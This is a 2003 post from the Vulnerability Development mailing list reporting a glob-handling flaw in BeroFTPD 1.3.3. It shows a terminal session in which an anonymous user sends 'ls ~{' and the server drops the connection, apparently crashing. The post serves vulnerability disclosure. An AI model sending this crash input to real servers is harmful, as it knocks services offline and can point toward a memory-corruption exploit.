Vulnerability Development mailing list archives

Older BeroFTPD glob

From: KF <dotslash () snosoft com>
Date: Mon, 01 Dec 2003 22:38:13 -0500

This is in the wu family... I don't know if it is still maintained and its had other issues like format strings and overflows...I just grabbed a random patch/version level to check this.I don't know about newer versions.
beroftpd-1.3.3-1.ppc.rpm :

[root@ibook root]# ftp localhost
Connected to localhost.localdomain.
220 ibook FTP server (BeroFTPD 1.3.3(1) Fri Jun 25 09:15:02 PDT 1999) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
421 Service not available, remote server has closed connection

-KF